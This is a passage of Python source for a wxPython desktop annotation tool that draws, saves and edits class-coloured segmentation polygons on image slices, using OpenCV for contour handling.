plotAnnotationsOverlay2(image_np_all_slices_normed_inside, image_np_all_slices_segmentation_inside):\r\n rgb_overlay = plotAnnotations2(image_np_all_slices_normed_inside, image_np_all_slices_segmentation_inside)\r\n img_out = np.zeros_like(rgb_overlay)\r\n cv2.addWeighted(rgb_overlay, 0.5, image_np_all_slices_normed_inside, 1, 0, img_out)\r\n return img_out\r\n\r\n\r\ndef plotAnnotations2(image_np_all_slices_normed_inside, image_np_all_slices_segmentation_inside):\r\n rgb_overlay = np.zeros_like(image_np_all_slices_normed_inside)\r\n labels_for_drawing = []\r\n for idx_class in range(NUM_CLASSES):\r\n rgb_overlay[image_np_all_slices_segmentation_inside[:, :, idx_class] > 0] = CLASS_COLORS_RGB[idx_class][::-1]\r\n return rgb_overlay\r\n\r\n# other helpers\r\n\r\ndef make_unique(original_list):\r\n unique_list = []\r\n map(lambda x: unique_list.append(x) if (x not in unique_list) else False, original_list)\r\n return unique_list\r\n\r\ndef removePolygonDuplicates(old_polygons):\r\n # add : polygons.append([current_area, self.selected_class, approxContourPoints, (rmin, rmax, cmin, cmax)])\r\n new_polygons = []\r\n for current_old_polygon in old_polygons:\r\n is_duplicate = False\r\n for current_new_polygon in new_polygons:\r\n if current_new_polygon[0] == current_old_polygon[0] and current_new_polygon[3][0] == current_old_polygon[3][0] and current_new_polygon[3][1] == current_old_polygon[3][1] and current_new_polygon[3][2] == current_old_polygon[3][2] and current_new_polygon[3][3] == current_old_polygon[3][3]:\r\n is_duplicate = True\r\n break\r\n if not is_duplicate:\r\n new_polygons.append(current_old_polygon)\r\n new_polygons = sorted(new_polygons, key=lambda x: x[0])\r\n return new_polygons\r\n\r\n###########################################################################\r\n## Python code generated with wxFormBuilder (version Jan 23 2018)\r\n## http://www.wxformbuilder.org/\r\n##\r\n## PLEASE DO *NOT* EDIT THIS FILE!\r\n###########################################################################\r\n\r\n\r\nclass PleaseWaitFrame(wx.Frame):\r\n\r\n def __init__(self, parent):\r\n wx.Frame.__init__(self, parent, id=wx.ID_ANY, title=wx.EmptyString, pos=wx.DefaultPosition,\r\n size=wx.Size(500, 300), style=0 | wx.TAB_TRAVERSAL)\r\n\r\n self.SetSizeHints(wx.DefaultSize, wx.DefaultSize)\r\n self.SetBackgroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_BTNHIGHLIGHT))\r\n\r\n bSizer2 = wx.BoxSizer(wx.VERTICAL)\r\n\r\n bSizer2.Add((0, 0), 1, wx.EXPAND, 5)\r\n\r\n self.m_staticText2 = wx.StaticText(self, wx.ID_ANY, u\"Așteptați...\", wx.DefaultPosition, wx.DefaultSize, 0)\r\n self.m_staticText2.Wrap(-1)\r\n\r\n bSizer2.Add(self.m_staticText2, 0, wx.ALL | wx.ALIGN_CENTER_HORIZONTAL, 5)\r\n\r\n bSizer2.Add((0, 0), 1, wx.EXPAND, 5)\r\n\r\n self.SetSizer(bSizer2)\r\n self.Layout()\r\n\r\n self.Centre(wx.BOTH)\r\n\r\n def __del__(self):\r\n pass\r\n\r\n\r\n###########################################################################\r\n## Class drawing_panel\r\n###########################################################################\r\n\r\nclass drawing_panel(wx.Panel):\r\n def __init__(self, parent, original_image, drawing_style, brush_size):\r\n global operation_changed\r\n operation_changed = False\r\n self.parent = parent\r\n self.brushSize = brush_size\r\n # self.original_image = original_image.Rotate90(False)\r\n self.original_image = original_image\r\n self.resized_bitmap = original_image.ConvertToBitmap()\r\n self.contourPoints = []\r\n self.old_area = 0\r\n wx.Panel.__init__(self, parent, id=wx.ID_ANY, pos=wx.DefaultPosition, size=wx.Size(800, 800),\r\n style=wx.TAB_TRAVERSAL)\r\n self.isDrawing = False\r\n self.drawingStyle = drawing_style\r\n self.dc = wx.ClientDC(self)\r\n self.gc = wx.GraphicsContext.Create(self.dc)\r\n self.selected_class = 0\r\n\r\n self.Bind(wx.EVT_MOVE, self.OnMove)\r\n self.Bind(wx.EVT_MOTION, self.OnMouseMove)\r\n self.Bind(wx.EVT_PAINT, self.OnPaint)\r\n self.Bind(wx.EVT_SIZE, self.OnResize)\r\n self.Bind(wx.EVT_LEFT_DOWN, self.startDrawing)\r\n self.Bind(wx.EVT_LEFT_UP, self.endDrawing)\r\n self.Bind(wx.EVT_CLOSE, self.OnCloseWindow)\r\n\r\n def paint(self, event=None):\r\n # print(\"paint\")\r\n dc = wx.PaintDC(self)\r\n dc.DrawBitmap(self.resized_bitmap, 0, 0, False);\r\n\r\n def OnMove(self, e):\r\n x, y = e.GetPosition()\r\n # print(\"current window position x = \", x, \" y= \", y)\r\n\r\n def OnMouseMove(self, e):\r\n if current_operation != 'edit':\r\n x, y = e.GetPosition()\r\n if self.isDrawing and self.drawingStyle == 'contour':\r\n self.contourPoints.append([x, y])\r\n if len(self.contourPoints) > 1:\r\n for idx, point in enumerate(self.contourPoints):\r\n if idx == len(self.contourPoints) - 1: # last point\r\n continue\r\n # self.gc.DrawLines(self.contourPoints[-2:-1])\r\n self.dc.DrawLine(self.contourPoints[-1][0], self.contourPoints[-1][1],\r\n self.contourPoints[-2][0], self.contourPoints[-2][1])\r\n elif self.isDrawing and self.drawingStyle == 'brush':\r\n self.contourPoints.append([x, y])\r\n\r\n # dc.SetBrush(wx.Brush(\"red\", wx.SOLID))\r\n # dc.SetPen(wx.Pen(\"red\", self.brushSize, style=wx.SOLID))\r\n\r\n if len(self.contourPoints) > 1:\r\n self.dc.DrawLine(self.contourPoints[-1][0], self.contourPoints[-1][1],\r\n self.contourPoints[-2][0], self.contourPoints[-2][1])\r\n # write seg @ mouse up\r\n\r\n elif self.isDrawing and self.drawingStyle == 'brushDelete':\r\n self.contourPoints.append([x, y])\r\n\r\n if len(self.contourPoints) > 1:\r\n # self.dc.DrawLine(self.contourPoints[-1][0], self.contourPoints[-1][1],\r\n # self.contourPoints[-2][0], self.contourPoints[-2][1])\r\n # self.dc = wx.ClientDC(self) #batman\r\n self.gc.DrawLines(self.contourPoints)\r\n # write seg @ mouse up\r\n # current_segmentation = self.getCurrentSegmentation()\r\n # print(np.count_nonzero(current_segmentation == [255,255,255]))\r\n\r\n # dc.DrawCircle(x, y, 1)\r\n # print(\"current panel mouse position x = \", x, \" y= \", y)\r\n\r\n def changeImage(self, new_image):\r\n self.dc = wx.ClientDC(self) # batman\r\n self.gc = wx.GraphicsContext.Create(self.dc) # batman\r\n self.original_image = new_image\r\n # self.original_image = new_image\r\n self.redrawImage()\r\n\r\n def OnPaint(self, event):\r\n self.redrawImage()\r\n\r\n def OnResize(self, event):\r\n self.redrawImage()\r\n self.dc.SetPen(wx.Pen(wx.Colour(CLASS_COLORS_RGB[self.selected_class]), style=wx.SOLID))\r\n self.gc.SetBrush(wx.Brush(\r\n wx.Colour(CLASS_COLORS_RGB[self.selected_class][0], CLASS_COLORS_RGB[self.selected_class][1],\r\n CLASS_COLORS_RGB[self.selected_class][2], 125), wx.SOLID))\r\n new_w, new_h = self.dc.GetSize()\r\n rescaled_contour_points = []\r\n for point in self.contourPoints:\r\n rescaled_contour_points.append([int(point[0] * IMAGE_WIDTH / new_w), int(point[1] * IMAGE_HEIGHT / new_h)])\r\n self.contourPoints = rescaled_contour_points\r\n\r\n def OnCloseWindow(self, e):\r\n global operation_changed\r\n operation_changed = False\r\n\r\n def redrawImage(self):\r\n self.dc = wx.ClientDC(self) # batman\r\n new_w, new_h = self.dc.GetSize()\r\n if new_w != 0 and new_h != 0:\r\n self.resized_bitmap = self.original_image.Scale(new_w, new_h).ConvertToBitmap()\r\n self.dc.DrawBitmap(self.resized_bitmap, 0, 0);\r\n\r\n def startDrawing(self, e):\r\n if current_operation != 'edit':\r\n x, y = e.GetPosition()\r\n self.isDrawing = True\r\n self.contourPoints.append([x, y])\r\n if self.isDrawing and self.drawingStyle == 'contour':\r\n self.dc.SetPen(wx.Pen(wx.Colour(CLASS_COLORS_RGB[self.selected_class]), style=wx.SOLID))\r\n self.gc.SetBrush(wx.Brush(\r\n wx.Colour(CLASS_COLORS_RGB[self.selected_class][0], CLASS_COLORS_RGB[self.selected_class][1],\r\n CLASS_COLORS_RGB[self.selected_class][2], 125), wx.SOLID))\r\n # self.gc.BeginLayer(125)\r\n elif self.isDrawing and self.drawingStyle == 'brushDelete':\r\n self.dc.SetBrush(wx.Brush(\"white\", wx.SOLID))\r\n self.dc.SetPen(wx.Pen(\"white\", self.brushSize, style=wx.SOLID))\r\n elif self.isDrawing and self.drawingStyle == 'brush':\r\n self.dc.SetBrush(wx.Brush(\"red\", wx.SOLID))\r\n self.dc.SetPen(wx.Pen(\"red\", self.brushSize, style=wx.SOLID))\r\n\r\n def endDrawing(self, e=None):\r\n global FIRST_CLICK\r\n global polygons_to_be_deleted\r\n if FIRST_CLICK:\r\n FIRST_CLICK = False\r\n return\r\n if current_operation != 'edit':\r\n # x, y = e.GetPosition()\r\n self.isDrawing = False\r\n # this should change depending on the drawing type but, hell, pre-alpha\r\n if self.drawingStyle == 'points':\r\n # draw points\r\n self.redrawImage()\r\n dc = wx.ClientDC(self)\r\n # dc.BeginDrawing()\r\n dc.SetPen(wx.Pen(\"green\", style=wx.SOLID))\r\n dc.SetBrush(wx.Brush(\"green\", wx.SOLID))\r\n for point in self.contourPoints:\r\n dc.DrawCircle(point[0], point[1], 3)\r\n if len(self.contourPoints) > 2:\r\n # ch = ConvexHull(np.array(self.contourPoints))\r\n # Get the indices of the hull points.\r\n # hull_indices = ch.vertices\r\n\r\n # These are the actual points.\r\n # hull_pts = self.contourPoints[hull_indices, :]\r\n # draw lines\r\n dc.SetPen(wx.Pen(CLASS_COLORS_RGB[self.selected_class], style=wx.SOLID))\r\n\r\n for idx, current_hull_index in enumerate(hull_indices):\r\n if idx == len(hull_indices) - 1:\r\n dc.DrawLine(self.contourPoints[hull_indices[idx]][0],\r\n self.contourPoints[hull_indices[idx]][1],\r\n self.contourPoints[hull_indices[0]][0], self.contourPoints[hull_indices[0]][1])\r\n else:\r\n dc.DrawLine(self.contourPoints[hull_indices[idx]][0],\r\n self.contourPoints[hull_indices[idx]][1],\r\n self.contourPoints[hull_indices[idx + 1]][0],\r\n self.contourPoints[hull_indices[idx + 1]][1])\r\n # plt.plot(pts[:, 0], pts[:, 1], 'ko', markersize=10)\r\n # plt.fill(hull_pts[:, 0], hull_pts[:, 1], fill=False, edgecolor='b')\r\n elif self.drawingStyle == 'contour':\r\n # draw last point\r\n self.redrawImage()\r\n\r\n # dc = wx.ClientDC(self)\r\n # dc.SetPen(wx.Pen(\"red\", style=wx.SOLID))\r\n # dc.DrawLine(self.contourPoints[-1][0], self.contourPoints[-1][1],\r\n # self.contourPoints[0][0], self.contourPoints[0][1])\r\n # fill contour\r\n # self.dc = wx.ClientDC(self)\r\n # self.gc = wx.GraphicsContext.Create(self.dc)\r\n self.dc.SetPen(wx.Pen(CLASS_COLORS_RGB[self.selected_class], style=wx.SOLID))\r\n\r\n self.gc.SetBrush(wx.Brush(\r\n wx.Colour(CLASS_COLORS_RGB[self.selected_class][0], CLASS_COLORS_RGB[self.selected_class][1],\r\n CLASS_COLORS_RGB[self.selected_class][2], 125), wx.SOLID))\r\n if len(self.contourPoints) > 1:\r\n self.gc.DrawLines(self.contourPoints)\r\n self.dc.DrawLines(self.contourPoints)\r\n # self.gc.DrawLines(self.contourPoints)\r\n # self.dc.DrawLines(self.contourPoints)\r\n elif current_operation == 'edit':\r\n x, y = e.GetPosition()\r\n print('here', x, y)\r\n new_w, new_h = self.dc.GetSize()\r\n x_scaled, y_scaled = (int(x * IMAGE_WIDTH / new_w), int(y * IMAGE_HEIGHT / new_h))\r\n #if polygons_to_be_deleted == []:\r\n for current_polygon in polygons:\r\n if cv2.pointPolygonTest(current_polygon[2], (x_scaled, y_scaled), True) > 0:\r\n polygons_to_be_deleted.append(current_polygon)\r\n #polygons_to_be_deleted = removePolygonDuplicates(polygons_to_be_deleted)\r\n print('appended')\r\n redrawSegmentationPolys(polygons_to_be_deleted, highlighted=0)\r\n self.parent.PrepAndChangeImage(plotAnnotationsOverlay())\r\n if len(polygons_to_be_deleted) > 0:\r\n self.parent.m_button31b.Enable()\r\n self.parent.m_button3.Enable()\r\n self.parent.m_choiceClass.Enable()\r\n self.parent.m_choiceClass.SetSelection(polygons_to_be_deleted[0][1])\r\n self.parent.m_button31c.Enable()\r\n if len(polygons_to_be_deleted) > 1:\r\n self.parent.m_button31p.Enable()\r\n self.parent.m_button31n.Enable()\r\n\r\n # self.clear()\r\n # self.parent.PrepAndChangeImage(self.parent.current_slice)\r\n\r\n def deleteLastVertex(self):\r\n self.contourPoints = self.contourPoints[:-1]\r\n self.endDrawing()\r\n\r\n def setDrawingStyle(self, drawing_style):\r\n self.drawingStyle = drawing_style\r\n\r\n def clear(self):\r\n dc = wx.ClientDC(self)\r\n dc.Clear()\r\n self.contourPoints = []\r\n self.redrawImage()\r\n\r\n def getCurrentSegmentation(self):\r\n dc = wx.ClientDC(self)\r\n img = self.saveSnapshot(dc)\r\n buf = img.GetDataBuffer() # use img.GetAlphaBuffer() for alpha data\r\n arr = np.frombuffer(buf, dtype='uint8')\r\n arr = np.reshape(arr, (dc.Size.height, dc.Size.width, 3)) # hardcoded num channels :/\r\n image = np.zeros_like(arr)\r\n image[np.where((arr == [255, 0, 0]).all(axis=2))] = [255, 255, 255]\r\n image[np.where((arr == [255, 255, 255]).all(axis=2))] = [255, 255, 255]\r\n image = cv2.rotate(image, 0)\r\n image_resized = cv2.resize(image, (self.original_image.Height, self.original_image.Width))\r\n return image_resized\r\n\r\n def savePolygon(self):\r\n global polygons\r\n if len(self.contourPoints) == 0:\r\n return\r\n # self.dc = wx.ClientDC(self) #batman\r\n new_w, new_h = self.dc.GetSize()\r\n rescaled_contour_points = []\r\n for point in self.contourPoints:\r\n rescaled_contour_points.append([int(point[0] * IMAGE_WIDTH / new_w), int(point[1] * IMAGE_HEIGHT / new_h)])\r\n\r\n if self.drawingStyle == 'contour':\r\n print('saved contour')\r\n send_to_back = self.parent.checkBox1.GetValue()\r\n print(image_np_all_slices_segmentation[:, :, self.selected_class].shape)\r\n approxContourPoints = cv2.approxPolyDP(np.asarray(rescaled_contour_points), 1, closed=True)\r\n\r\n bw_poly = cv2.fillPoly(np.zeros_like(image_np_all_slices_normed[:, :, 0]), [approxContourPoints], 255,\r\n 8) > 0\r\n\r\n current_area = np.count_nonzero(bw_poly)\r\n\r\n rmin, rmax, cmin, cmax = bbox_np(bw_poly)\r\n\r\n self.old_area = current_area\r\n old_area_list.append(current_area)\r\n\r\n if send_to_back:\r\n for idx_class in range(NUM_CLASSES):\r\n bw_poly[np.where(image_np_all_slices_segmentation[:, :, idx_class] > 0)] = 0\r\n # cv2.imwrite('out_bw_poly.png', np.array(bw_poly*255, dtype=np.uint8))\r\n contours, hierarchy = cv2.findContours(np.array(bw_poly, dtype=np.uint8), cv2.RETR_LIST,\r\n cv2.CHAIN_APPROX_SIMPLE)\r\n contours = sorted(contours, key=lambda x: cv2.contourArea(x), reverse=True)\r\n for cnt in contours:\r\n approxContourPoints = cv2.approxPolyDP(np.asarray(cnt), 1, closed=True)\r\n print(cnt)\r\n print('problem here')\r\n break\r\n # check dealbreaker\r\n \"\"\" \r\n if self.selected_class != 4 and self.selected_class != 7:\r\n avg_p_x = 0\r\n avg_p_y = 0\r\n for p in approxContourPoints:\r\n avg_p_x+=p[0][0]\r\n avg_p_y+=p[0][1]\r\n avg_p_x /=len(approxContourPoints)\r\n avg_p_y /=len(approxContourPoints)\r\n if cv2.pointPolygonTest(approxContourPoints, (avg_p_x, avg_p_y), True) < 0:\r\n style = wx.ICON_ERROR | wx.OK\r\n dialog = wx.MessageDialog(None, 'Polygon is not convex', 'Error', style)\r\n dialogResult = dialog.ShowModal()\r\n dialog.Destroy()\r\n self.contourPoints = []\r\n self.parent.PrepAndChangeImage(plotAnnotationsOverlay())\r\n return\r\n \"\"\"\r\n polygons.append([current_area, self.selected_class, approxContourPoints, (rmin, rmax, cmin, cmax)])\r\n polygons = sorted(polygons, reverse=True, key=lambda x: x[0])\r\n drawSegmentationPolys(fromArea=current_area, current_seg=bw_poly, current_class=self.selected_class,\r\n limits=(rmin, rmax, cmin, cmax))\r\n\r\n self.parent.PrepAndChangeImage(plotAnnotationsOverlay())\r\n self.contourPoints = []\r\n\r\n elif self.drawingStyle == 'brush':\r\n # approximate curve -- closed does NOT work, for whatever reason\r\n approxContourPoints = cv2.approxPolyDP(np.asarray(self.contourPoints), 1, closed=True)\r\n\r\n def saveSnapshot(self, dcSource):\r\n # based largely on code posted to wxpython-users by Andrea Gavana 2006-11-08\r\n size = dcSource.Size\r\n\r\n # Create a Bitmap that will later on hold the screenshot image\r\n # Note that the Bitmap must have a size big enough to hold the screenshot\r\n # -1 means using the current default colour depth\r\n bmp = wx.Bitmap(size.width, size.height) #\r\n\r\n # Create a memory DC that will be used for actually taking the screenshot\r\n memDC = wx.MemoryDC()\r\n\r\n # Tell the memory DC to use our Bitmap\r\n # all drawing action on the memory DC will go to the Bitmap now\r\n memDC.SelectObject(bmp)\r\n\r\n # Blit (in this case copy) the actual screen on the memory DC\r\n # and thus the Bitmap\r\n memDC.Blit(0, # Copy to this X coordinate\r\n 0, # Copy to this Y coordinate\r\n size.width, # Copy this width\r\n size.height, # Copy this height\r\n dcSource, # From where do we copy?\r\n 0, # What's the X offset in the original DC?\r\n 0 # What's the Y offset in the original DC?\r\n )\r\n\r\n # Select the Bitmap out of the memory DC by selecting a new\r\n # uninitialized Bitmap\r\n memDC.SelectObject(wx.NullBitmap)\r\n\r\n img = bmp.ConvertToImage()\r\n return img\r\n\r\n def __del__(self):\r\n pass\r\n\r\n\r\n###########################################################################\r\n## Class seg_frame\r\n###########################################################################\r\n\r\nclass seg_frame(wx.Frame):\r\n def __init__(self, parent, title):\r\n self._current_slice = 0\r\n self.num_slices_current_axis = NUM_SLICES\r\n wx.Frame.__init__(self, parent, id=wx.ID_ANY, title=title, pos=wx.DefaultPosition,\r\n size=wx.Size(1280, 768), style=wx.DEFAULT_FRAME_STYLE | wx.TAB_TRAVERSAL, name=u\"Seg\")\r\n\r\n self.SetSizeHints(wx.DefaultSize, wx.DefaultSize)\r\n\r\n bSizer1 = wx.BoxSizer(wx.VERTICAL)\r\n\r\n bSizer2 = wx.BoxSizer(wx.HORIZONTAL)\r\n\r\n self.bSizer2Ext = bSizer2\r\n\r\n self.m_button5 = wx.Button(self, 83, _(\"Save frame\"), wx.DefaultPosition, wx.DefaultSize, 0)\r\n bSizer2.Add(self.m_button5, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)\r\n\r\n # if current_operation == 'segment':\r\n self.m_button6 = wx.Button(self, 84, _(\"Save current polygon\"), wx.DefaultPosition, wx.DefaultSize, 0)\r\n self.m_button6.Hide()\r\n bSizer2.Add(self.m_button6, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)\r\n\r\n # if current_operation == 'segment':\r\n self.m_button31 = wx.Button(self, 81, _(\"Delete last vertex\"), wx.DefaultPosition, wx.DefaultSize, 0)\r\n self.m_button31.SetForegroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_WINDOWTEXT))\r\n self.m_button31.Hide()\r\n bSizer2.Add(self.m_button31, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)\r\n\r\n self.m_button3 = wx.Button(self, 80, _(\"Delete current polygon\"), wx.DefaultPosition, wx.DefaultSize, 0)\r\n if current_operation == 'edit':\r\n self.m_button3.Disable()\r\n self.m_button3.SetForegroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_WINDOWTEXT))\r\n\r\n bSizer2.Add(self.m_button3, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)\r\n # if current_operation == 'segment':\r\n\r\n self.checkBox1 = wx.CheckBox(self, 201, _(\"Send to back\"))\r\n self.checkBox1.Hide()\r\n bSizer2.Add(self.checkBox1, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)\r\n\r\n self.checkBox2 = wx.CheckBox(self, 210, _(\"Hide seg\"))\r\n self.checkBox2.Hide()\r\n bSizer2.Add(self.checkBox2, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)\r\n\r\n self.m_button31x = wx.Button(self, 202, _(\"Undo polygon\"), wx.DefaultPosition, wx.DefaultSize, 0)\r\n self.m_button31x.SetForegroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_WINDOWTEXT))\r\n self.m_button31x.Hide()\r\n bSizer2.Add(self.m_button31x, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)\r\n\r\n # edit mode\r\n # if current_operation == 'edit':\r\n self.m_button31p = wx.Button(self, 203, _(\"Previous polygon\"), wx.DefaultPosition, wx.DefaultSize, 0)\r\n self.m_button31p.SetForegroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_WINDOWTEXT))\r\n self.m_button31p.Disable()\r\n self.m_button31p.Hide()\r\n\r\n bSizer2.Add(self.m_button31p, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)\r\n\r\n self.m_button31n = wx.Button(self, 204, _(\"Next polygon\"), wx.DefaultPosition, wx.DefaultSize, 0)\r\n self.m_button31n.SetForegroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_WINDOWTEXT))\r\n self.m_button31n.Disable()\r\n self.m_button31n.Hide()\r\n\r\n bSizer2.Add(self.m_button31n, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)\r\n\r\n self.m_choiceClass = wx.Choice(self, 206, choices=CLASS_NAMES);\r\n self.m_choiceClass.Disable()\r\n self.m_choiceClass.Hide()\r\n\r\n bSizer2.Add(self.m_choiceClass, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)\r\n\r\n self.m_button31c = wx.Button(self, 207, _(\"Change class\"), wx.DefaultPosition, wx.DefaultSize, 0)\r\n self.m_button31c.SetForegroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_WINDOWTEXT))\r\n self.m_button31c.Disable()\r\n self.m_button31c.Hide()\r\n\r\n bSizer2.Add(self.m_button31c, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)\r\n\r\n self.m_button31b = wx.Button(self, 205, _(\"Back to segmentation\"), wx.DefaultPosition, wx.DefaultSize, 0)\r\n self.m_button31b.SetForegroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_WINDOWTEXT))\r\n self.m_button31b.Disable()\r\n self.m_button31b.Hide()\r\n\r\n bSizer2.Add(self.m_button31b, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)\r\n\r\n self.rbox = wx.RadioBox(self, label=_(\"Mode\"), size= wx.DefaultSize, choices=operations_list_translated, majorDimension=1,\r\n style=wx.RA_SPECIFY_ROWS)\r\n self.rbox.SetSelection(operations_list.index(current_operation))\r\n self.rbox.Bind(wx.EVT_RADIOBOX, self.OnRadioBox)\r\n\r\n bSizer2.Add(self.rbox, 0, wx.ALL | wx.ALIGN_LEFT, 5)\r\n\r\n self.m_button111 = wx.Button(self, 208, _(\"Previous\"), wx.DefaultPosition, wx.DefaultSize, 0)\r\n bSizer2.Add(self.m_button111, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)\r\n self.m_button112 = wx.Button(self, 209, _(\"Next\"), wx.DefaultPosition, wx.DefaultSize, 0)\r\n bSizer2.Add(self.m_button112, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)\r\n\r\n bSizer1.Add(bSizer2, 0, wx.EXPAND, 5)\r\n\r\n self.bSizer81 = wx.BoxSizer(wx.HORIZONTAL)\r\n\r\n # if current_operation == 'segment':\r\n self.m_staticText121 = wx.StaticText(self, wx.ID_ANY, _(\"Draw class\"), wx.DefaultPosition, wx.DefaultSize, 0)\r\n self.m_staticText121.Wrap(-1)\r\n\r\n self.bSizer81.Add(self.m_staticText121, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)\r\n\r\n self.buttons_classes = []\r\n\r\n for idxx in range(START_BUTTON_ID_CLASSES, START_BUTTON_ID_CLASSES + NUM_CLASSES):\r\n current_button = wx.Button(self, idxx, CLASS_NAMES[idxx - START_BUTTON_ID_CLASSES], wx.DefaultPosition,\r\n wx.DefaultSize, 0)\r\n self.buttons_classes.append(current_button)\r\n self.bSizer81.Add(self.buttons_classes[-1], 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)\r\n\r\n # if current_operation == 'segment':\r\n self.bSizer81.ShowItems(show=False)\r\n bSizer1.Add(self.bSizer81, 0, wx.ALL, 5)\r\n\r\n bSizer3 = wx.BoxSizer(wx.HORIZONTAL)\r\n\r\n bSizer4 = wx.BoxSizer(wx.VERTICAL)\r\n\r\n bSizer4.Add((0, 0), 1, wx.EXPAND, 5)\r\n\r\n # self.m_bpButton1 = wx.BitmapButton(self, 76, wx.Bitmap(u\"arrow_left_half.png\", wx.BITMAP_TYPE_ANY),\r\n # wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW)\r\n\r\n bSizer4.Add((0, 0), 1, wx.EXPAND, 5)\r\n\r\n # self.m_button11 = wx.Button(self, wx.ID_ANY, u\"Previous CT\", wx.DefaultPosition, wx.DefaultSize, 0)\r\n # bSizer4.Add(self.m_button11, 0, wx.ALL, 5)\r\n\r\n bSizer3.Add(bSizer4, 0, wx.EXPAND, 5)\r\n\r\n bSizer8 = wx.BoxSizer(wx.VERTICAL)\r\n\r\n image = wx.Image(IMAGE_WIDTH, IMAGE_HEIGHT) # EmptyImage\r\n # image.SetData(np_prep_image.tostring())\r\n\r\n #\r\n self.drawPane = drawing_panel(self, image, 'contour', 20) # brush size\r\n # bSizer8.Add(self.drawPane, 1, wx.ALL | wx.EXPAND, 5)\r\n bSizer8.Add(self.drawPane, 1, wx.EXPAND, 5)\r\n # if current_operation == 'segment':\r\n self.buttons_classes[self.drawPane.selected_class].SetBackgroundColour(\r\n wx.Colour(CLASS_COLORS_RGB[self.drawPane.selected_class][0],\r\n CLASS_COLORS_RGB[self.drawPane.selected_class][1],\r\n CLASS_COLORS_RGB[self.drawPane.selected_class][2],\r\n 125))\r\n\r\n bSizer3.Add(bSizer8, 1, wx.EXPAND, 5)\r\n\r\n bSizer41 = wx.BoxSizer(wx.VERTICAL)\r\n\r\n bSizer41.Add((0, 0), 1, wx.EXPAND, 5)\r\n\r\n bSizer41.Add((0, 0), 1, wx.EXPAND, 5)\r\n\r\n # self.m_button111 = wx.Button(self, wx.ID_ANY, u\"Next\", wx.DefaultPosition, wx.DefaultSize, 0)\r\n # bSizer41.Add(self.m_button111, 0, wx.ALL | wx.ALIGN_RIGHT, 5)\r\n\r\n bSizer3.Add(bSizer41, 0, wx.EXPAND, 5)\r\n\r\n bSizer7 = wx.BoxSizer(wx.VERTICAL)\r\n\r\n bSizer3.Add(bSizer7, 1, wx.EXPAND, 5)\r\n\r\n bSizer1.Add(bSizer3, 1, wx.EXPAND, 5)\r\n\r\n self.initOperation()\r\n\r\n self.SetSizer(bSizer1)\r\n self.Layout()\r\n\r\n self.Centre(wx.BOTH)\r\n\r\n self.Bind(wx.EVT_MOVE, self.OnMove)\r\n self.Bind(wx.EVT_BUTTON, self.OnButtonClicked)\r\n self.Bind(wx.EVT_SCROLL, self.OnScrollChanged)\r\n self.Bind(wx.EVT_COMBOBOX, self.OnComboboxChanged)\r\n self.Bind(wx.EVT_CHAR_HOOK, self.OnKeyDown)\r\n self.Bind(wx.EVT_CHECKBOX, self.OnCheckBoxChanged)\r\n # self.m_comboBox11.Bind(wx.EVT_COMBOBOX, self.OnComboboxChanged)\r\n # this isn't supposed to be here, but otherwise it fails to draw the segmentation for the 1st slice\r\n self.PrepAndChangeImage(plotAnnotationsOverlay())\r\n\r\n @property\r\n def current_slice(self):\r\n return self._current_slice\r\n\r\n @current_slice.setter\r\n def current_slice(self, value):\r\n if value < 0:\r\n self._current_slice = 0\r\n elif value > self.num_slices_current_axis - 1:\r\n self._current_slice = self.num_slices_current_axis - 1\r\n else:\r\n self._current_slice = value\r\n self.m_comboBox1.Value = str(self._current_slice + 1)\r\n\r\n def initOperation(self):\r\n if current_operation == 'segment':\r\n # show\r\n self.m_button6.Show()\r\n self.m_button31.Show()\r\n self.checkBox1.Show()\r\n self.checkBox2.Show()\r\n self.m_button31x.Show()\r\n self.bSizer81.ShowItems(show=True)\r\n # hide\r\n self.m_button31p.Hide()\r\n self.m_button31n.Hide()\r\n self.m_button31c.Hide()\r\n self.m_button31b.Hide()\r\n self.m_choiceClass.Hide()\r\n # enable\r\n self.m_button3.Enable()\r\n\r\n # bug\r\n #self.rbox.SetBackgroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_HIGHLIGHT))\r\n self.rbox.Refresh()\r\n #self.bSizer2Ext.Layout()\r\n if current_operation == 'edit':\r\n # hide\r\n self.m_button6.Hide()\r\n self.m_button31.Hide()\r\n self.checkBox1.Hide()\r\n self.checkBox2.Hide()\r\n self.m_button31x.Hide()\r\n self.bSizer81.ShowItems(show=False)\r\n # show\r\n self.m_button31p.Show()\r\n self.m_button31n.Show()\r\n self.m_button31c.Show()\r\n self.m_button31b.Show()\r\n self.m_choiceClass.Show()\r\n # disable\r\n self.m_button3.Disable()\r\n # delete\r\n self.drawPane.contourPoints = []\r\n # bug\r\n self.rbox.Refresh()\r\n #self.rbox.Layout()\r\n\r\n def OnRadioBox(self, e):\r\n global current_operation\r\n global operation_changed\r\n #operation_changed = True\r\n current_operation = operations_list[self.rbox.GetSelection()]\r\n # self.__init__(self, \"segmentation\")\r\n self.initOperation()\r\n # self.mainLogin.Hide()\r\n self.Layout()\r\n # self.__init__(None, title=\"lala\")\r\n # self.Close()\r\n\r\n def OnMove(self, e):\r\n x, y = 